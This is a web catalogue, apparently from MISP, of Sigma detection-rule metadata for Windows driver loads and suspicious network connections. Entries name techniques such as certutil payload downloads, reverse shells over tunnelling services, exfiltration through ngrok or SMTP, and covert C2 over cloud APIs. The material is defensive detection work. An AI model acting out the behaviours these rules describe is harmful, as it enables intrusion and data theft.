PUA - System Informer Driver Load

Detects driver load of the System Informer tool

Internal MISP references

UUID 10cb6535-b31d-4512-9962-513dcbc42cc1 which can be used as unique global reference for PUA - System Informer Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/08
falsepositive ['System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly']
filename driver_load_win_pua_system_informer.yml
level medium
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Vulnerable Driver Load By Name

Detects the load of known vulnerable drivers via the file name of the drivers.

Internal MISP references

UUID 72cd00d6-490c-4650-86ff-1d11f491daa1 which can be used as unique global reference for Vulnerable Driver Load By Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/03
falsepositive ["False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", 'If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)']
filename driver_load_win_vuln_drivers_names.yml
level low
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Vulnerable WinRing0 Driver Load

Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation

Internal MISP references

UUID 1a42dfa6-6cb2-4df9-9b48-295be477e835 which can be used as unique global reference for Vulnerable WinRing0 Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/26
falsepositive ['Unknown']
filename driver_load_win_vuln_winring0_driver.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

WinDivert Driver Load

Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows

Internal MISP references

UUID 679085d5-f427-4484-9f58-1dc30a7c426d which can be used as unique global reference for WinDivert Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/30
falsepositive ['Legitimate WinDivert driver usage']
filename driver_load_win_windivert.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.collection', 'attack.defense_evasion', 'attack.t1599.001', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

Malicious Driver Load

Detects loading of known malicious drivers via their hash.

Internal MISP references

UUID 05296024-fe8a-4baf-8f3d-9a5f5624ceb2 which can be used as unique global reference for Malicious Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/18
falsepositive ['Unknown']
filename driver_load_win_mal_drivers.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Vulnerable Driver Load

Detects loading of known vulnerable drivers via their hash.

Internal MISP references

UUID 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8 which can be used as unique global reference for Vulnerable Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/18
falsepositive ['Unknown']
filename driver_load_win_vuln_drivers.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Network Connection Initiated To Visual Studio Code Tunnels Domain

Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID 4b657234-038e-4ad5-997c-4be42340bce4 which can be used as unique global reference for Network Connection Initiated To Visual Studio Code Tunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kamran Saifullah
creation_date 2023/11/20
falsepositive ['Legitimate use of Visual Studio Code tunnel will also trigger this.']
filename net_connection_win_vscode_tunnel_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.001']
Related clusters

To see the related clusters, click here.

Connection Initiated Via Certutil.EXE

Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.

Internal MISP references

UUID 0dba975d-a193-4ed1-a067-424df57570d1 which can be used as unique global reference for Connection Initiated Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/09/02
falsepositive ['Unknown']
filename net_connection_win_certutil_initiated_connection.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Network Connection Initiated By AddinUtil.EXE

Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.

Internal MISP references

UUID 5205613d-2a63-4412-a895-3a2458b587b3 which can be used as unique global reference for Network Connection Initiated By AddinUtil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename net_connection_win_addinutil.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Python Initiated Connection

Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.

Internal MISP references

UUID bef0bc5a-b9ae-425d-85c6-7b2d705980c6 which can be used as unique global reference for Python Initiated Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying.']
filename net_connection_win_python.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Potential Remote PowerShell Session Initiated

Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicates a remote PowerShell connection.

Internal MISP references

UUID c539afac-c12a-46ed-b1bd-5a5567c9f045 which can be used as unique global reference for Potential Remote PowerShell Session Initiated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/09/12
falsepositive ['Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.', 'Network Service user name of a not-covered localization']
filename net_connection_win_susp_remote_powershell_session.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

Outbound Network Connection To Public IP Via Winlogon

Detects a "winlogon.exe" process that initiate network communications with public IP addresses

Internal MISP references

UUID 7610a4ea-c06d-495f-a2ac-0a696abcfd3b which can be used as unique global reference for Outbound Network Connection To Public IP Via Winlogon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2023/04/28
falsepositive ['Communication to other corporate systems that use IP addresses from public address spaces']
filename net_connection_win_winlogon_net_connections.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.command_and_control', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Script Initiated Connection to Non-Local Network

Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.

Internal MISP references

UUID 992a6cae-db6a-43c8-9cec-76d7195c96fc which can be used as unique global reference for Script Initiated Connection to Non-Local Network in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/08/28
falsepositive ['Legitimate scripts']
filename net_connection_win_script_wan.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious Network Connection Binary No CommandLine

Detects suspicious network connections made by a well-known Windows binary run with no command line parameters

Internal MISP references

UUID 20384606-a124-4fec-acbb-8bd373728613 which can be used as unique global reference for Suspicious Network Connection Binary No CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/03
falsepositive ['Unknown']
filename net_connection_win_susp_binary_no_cmdline.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion']

Potentially Suspicious Wuauclt Network Connection

Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.

Internal MISP references

UUID c649a6c7-cd8c-4a78-9c04-000fc76df954 which can be used as unique global reference for Potentially Suspicious Wuauclt Network Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/12
falsepositive ['Unknown']
filename net_connection_win_wuauclt_network_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Rundll32 Internet Connection

Detects a rundll32 that communicates with public IP addresses

Internal MISP references

UUID cdc8da7d-c303-42f8-b08c-b4ab47230263 which can be used as unique global reference for Rundll32 Internet Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/11/04
falsepositive ['Communication to other corporate systems that use IP addresses from public address spaces']
filename net_connection_win_rundll32_net_connections.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011', 'attack.execution']
Related clusters

To see the related clusters, click here.

Office Application Initiated Network Connection Over Uncommon Ports

Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.

Internal MISP references

UUID 3b5ba899-9842-4bc2-acc2-12308498bf42 which can be used as unique global reference for Office Application Initiated Network Connection Over Uncommon Ports in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/12
falsepositive ['Other ports can be used, apply additional filters accordingly']
filename net_connection_win_office_uncommon_ports.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.command_and_control']

Network Connection Initiated By Regsvr32.EXE

Detects a network connection initiated by "Regsvr32.exe"

Internal MISP references

UUID c7e91a02-d771-4a6d-a700-42587e0b1095 which can be used as unique global reference for Network Connection Initiated By Regsvr32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dmitriy Lifanov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename net_connection_win_regsvr32_network_activity.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1559.001', 'attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Microsoft Sync Center Suspicious Network Connections

Detects suspicious connections from Microsoft Sync Center to non-private IPs.

Internal MISP references

UUID 9f2cc74d-78af-4eb2-bb64-9cd1d292b87b which can be used as unique global reference for Microsoft Sync Center Suspicious Network Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/04/28
falsepositive ['Unknown']
filename net_connection_win_susp_outbound_mobsync_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.t1055', 'attack.t1218', 'attack.execution', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

RDP to HTTP or HTTPS Target Ports

Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443

Internal MISP references

UUID b1e5da3b-ca8e-4adf-915c-9921f3d85481 which can be used as unique global reference for RDP to HTTP or HTTPS Target Ports in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/29
falsepositive ['Unknown']
filename net_connection_win_rdp_to_http.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572', 'attack.lateral_movement', 'attack.t1021.001', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

Communication To Uncommon Destination Ports

Detects programs that connect to uncommon destination ports

Internal MISP references

UUID 6d8c3d20-a5e1-494f-8412-4571d716cf5c which can be used as unique global reference for Communication To Uncommon Destination Ports in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/19
falsepositive ['Unknown']
filename net_connection_win_susp_malware_callback_ports_uncommon.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1571']
Related clusters

To see the related clusters, click here.

Suspicious Outbound SMTP Connections

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Internal MISP references

UUID 9976fa64-2804-423c-8a5b-646ade840773 which can be used as unique global reference for Suspicious Outbound SMTP Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Other SMTP tools']
filename net_connection_win_susp_outbound_smtp_connections.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003']
Related clusters

To see the related clusters, click here.

Network Communication With Crypto Mining Pool

Detects initiated network connections to crypto mining pools

Internal MISP references

UUID fa5b1358-b040-4403-9868-15f7d9ab6329 which can be used as unique global reference for Network Communication With Crypto Mining Pool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Unlikely']
filename net_connection_win_susp_crypto_mining_pools.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.impact', 'attack.t1496']
Related clusters

To see the related clusters, click here.

Office Application Initiated Network Connection To Non-Local IP

Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization.

Internal MISP references

UUID 75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84 which can be used as unique global reference for Office Application Initiated Network Connection To Non-Local IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton
creation_date 2021/11/10
falsepositive ['You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.', 'Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned.', 'It is highly recommended to baseline your activity and tune out common business use cases.']
filename net_connection_win_office_outbound_non_local_ip.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1203']
Related clusters

To see the related clusters, click here.

Silenttrinity Stager Msbuild Activity

Detects a possible remote connections to Silenttrinity c2

Internal MISP references

UUID 50e54b8d-ad73-43f8-96a1-5191685b17a4 which can be used as unique global reference for Silenttrinity Stager Msbuild Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kiran kumar s, oscd.community
creation_date 2020/10/11
falsepositive ['Unknown']
filename net_connection_win_silenttrinity_stager_msbuild_activity.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1127.001']
Related clusters

To see the related clusters, click here.

Outbound RDP Connections Over Non-Standard Tools

Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.

Internal MISP references

UUID ed74fe75-7594-4b4b-ae38-e38e3fd2eb23 which can be used as unique global reference for Outbound RDP Connections Over Non-Standard Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2019/05/15
falsepositive ['Third party RDP tools']
filename net_connection_win_rdp_outbound_over_non_standard_tools.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.001', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

Suspicious Wordpad Outbound Connections

Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.

Internal MISP references

UUID 786cdae8-fefb-4eb2-9227-04e34060db01 which can be used as unique global reference for Suspicious Wordpad Outbound Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/12
falsepositive ['Other ports can be used, apply additional filters accordingly']
filename net_connection_win_wordpad_uncommon_ports.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.command_and_control']

Network Connection Initiated To DevTunnels Domain

Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 which can be used as unique global reference for Network Connection Initiated To DevTunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kamran Saifullah
creation_date 2023/11/20
falsepositive ['Legitimate use of Devtunnels will also trigger this.']
filename net_connection_win_susp_devtunnel_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.001']
Related clusters

To see the related clusters, click here.

Script Initiated Connection

Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.

Internal MISP references

UUID 08249dc0-a28d-4555-8ba5-9255a198e08c which can be used as unique global reference for Script Initiated Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/28
falsepositive ['Legitimate scripts']
filename net_connection_win_script.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious Non-Browser Network Communication With Telegram API

Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2

Internal MISP references

UUID c3dbbc9f-ef1d-470a-a90a-d343448d5875 which can be used as unique global reference for Suspicious Non-Browser Network Communication With Telegram API in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/19
falsepositive ['Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc.']
filename net_connection_win_telegram_api_non_browser_access.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102']
Related clusters

To see the related clusters, click here.

Uncommon Outbound Kerberos Connection

Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.

Internal MISP references

UUID e54979bd-c5f9-4d6c-967b-a04b19ac4c74 which can be used as unique global reference for Uncommon Outbound Kerberos Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/24
falsepositive ['Web Browsers and third party application might generate similar activity. An initial baseline is required.']
filename net_connection_win_susp_outbound_kerberos_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.credential_access', 'attack.t1558', 'attack.lateral_movement', 'attack.t1550.003']
Related clusters

To see the related clusters, click here.

Msiexec.EXE Initiated Network Connection Over HTTP

Detects an initiated network connection by "Msiexec.exe" over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.

Internal MISP references

UUID 8e5e38e4-5350-4c0b-895a-e872ce0dd54f which can be used as unique global reference for Msiexec.EXE Initiated Network Connection Over HTTP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Some rare installers were seen communicating with external servers for additional information. While its a very rare occurrence in some environments an initial baseline might be required.']
filename net_connection_win_msiexec_http.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

Suspicious Program Location with Network Connections

Detects programs with network connections running in suspicious files system locations

Internal MISP references

UUID 7b434893-c57d-4f41-908d-6a17bf1ae98f which can be used as unique global reference for Suspicious Program Location with Network Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2017/03/19
falsepositive ['Unknown']
filename net_connection_win_susp_prog_location_network_connection.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

RDP Over Reverse SSH Tunnel

Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389

Internal MISP references

UUID 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4 which can be used as unique global reference for RDP Over Reverse SSH Tunnel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/02/16
falsepositive ['Unknown']
filename net_connection_win_rdp_reverse_tunnel.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572', 'attack.lateral_movement', 'attack.t1021.001', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Network Connection To Notion API

Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"

Internal MISP references

UUID 7e9cf7b6-e827-11ed-a05b-15959c120003 which can be used as unique global reference for Potentially Suspicious Network Connection To Notion API in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Gavin Knapp
creation_date 2023/05/03
falsepositive ['Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured.']
filename net_connection_win_notion_api_susp_communication.yml
level low
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102']
Related clusters

To see the related clusters, click here.

Network Connection Initiated Via Notepad.EXE

Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.

Internal MISP references

UUID e81528db-fc02-45e8-8e98-4e84aba1f10b which can be used as unique global reference for Network Connection Initiated Via Notepad.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author EagleEye Team
creation_date 2020/05/14
falsepositive ['Printing documents via notepad might cause communication with the printer via port 9100 or similar.']
filename net_connection_win_notepad.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.execution', 'attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Suspicious Non-Browser Network Communication With Google API

Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)

Internal MISP references

UUID 7e9cf7b6-e827-11ed-a05b-0242ac120003 which can be used as unique global reference for Suspicious Non-Browser Network Communication With Google API in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Gavin Knapp
creation_date 2023/05/01
falsepositive ['Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning.']
filename net_connection_win_susp_google_api_non_browser_access.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102']
Related clusters

To see the related clusters, click here.

Network Connection Initiated By IMEWDBLD.EXE

Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.

Internal MISP references

UUID 8d7e392e-9b28-49e1-831d-5949c6281228 which can be used as unique global reference for Network Connection Initiated By IMEWDBLD.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Unknown']
filename net_connection_win_imewdbld.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Network Connection Initiated To Mega.nz

Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.

Internal MISP references

UUID fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4 which can be used as unique global reference for Network Connection Initiated To Mega.nz in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/06
falsepositive ['Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool.']
filename net_connection_win_domain_mega_nz.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.001']
Related clusters

To see the related clusters, click here.

Dllhost.EXE Initiated Network Connection To Non-Local IP Address

Detects dllhost initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.

Internal MISP references

UUID cfed2f44-16df-4bf3-833a-79405198b277 which can be used as unique global reference for Dllhost.EXE Initiated Network Connection To Non-Local IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author bartblaze
creation_date 2020/07/13
falsepositive ['Communication to other corporate systems that use IP addresses from public address spaces']
filename net_connection_win_dllhost_non_local_ip.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution', 'attack.t1559.001']
Related clusters

To see the related clusters, click here.

Cmstp Making Network Connection

Detects suspicious network connection by Cmstp

Internal MISP references

UUID efafe0bf-4238-479e-af8f-797bd3490d2d which can be used as unique global reference for Cmstp Making Network Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/30
falsepositive ['Unknown']
filename net_connection_win_susp_cmstp.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.003']
Related clusters

To see the related clusters, click here.

Equation Editor Network Connection

Detects network connections from Equation Editor

Internal MISP references

UUID a66bc059-c370-472c-a0d7-f8fd1bf9d583 which can be used as unique global reference for Equation Editor Network Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/04/14
falsepositive ['Unlikely']
filename net_connection_win_eqnedt.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1203']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Malware Callback Communication

Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases

Internal MISP references

UUID 4b89abaa-99fe-4232-afdd-8f9aa4d20382 which can be used as unique global reference for Potentially Suspicious Malware Callback Communication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/19
falsepositive ['Unknown']
filename net_connection_win_susp_malware_callback_port.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1571']
Related clusters

To see the related clusters, click here.

Suspicious Network Connection to IP Lookup Service APIs

Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.

Internal MISP references

UUID edf3485d-dac4-4d50-90e4-b0e5813f7e60 which can be used as unique global reference for Suspicious Network Connection to IP Lookup Service APIs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/24
falsepositive ['Legitimate use of the external websites for troubleshooting or network monitoring']
filename net_connection_win_susp_external_ip_lookup.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.discovery', 'attack.t1016']
Related clusters

To see the related clusters, click here.

Communication To Ngrok Tunneling Service Initiated

Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.

Internal MISP references

UUID 1d08ac94-400d-4469-a82f-daee9a908849 which can be used as unique global reference for Communication To Ngrok Tunneling Service Initiated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/03
falsepositive ['Legitimate use of the ngrok service.']
filename net_connection_win_domain_ngrok_tunnel.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.command_and_control', 'attack.t1567', 'attack.t1568.002', 'attack.t1572', 'attack.t1090', 'attack.t1102', 'attack.s0508']
Related clusters

To see the related clusters, click here.

Suspicious Dropbox API Usage

Detects an executable that isn't dropbox but communicates with the Dropbox API

Internal MISP references

UUID 25eabf56-22f0-4915-a1ed-056b8dae0a68 which can be used as unique global reference for Suspicious Dropbox API Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/20
falsepositive ["Legitimate use of the API with a tool that the author wasn't aware of"]
filename net_connection_win_susp_dropbox_api.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Process Initiated Network Connection To Ngrok Domain

Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.

Internal MISP references

UUID 18249279-932f-45e2-b37a-8925f2597670 which can be used as unique global reference for Process Initiated Network Connection To Ngrok Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/16
falsepositive ['Legitimate use of the ngrok service.']
filename net_connection_win_domain_ngrok.yml
level high
logsource.category network_connection
logsource.product windows
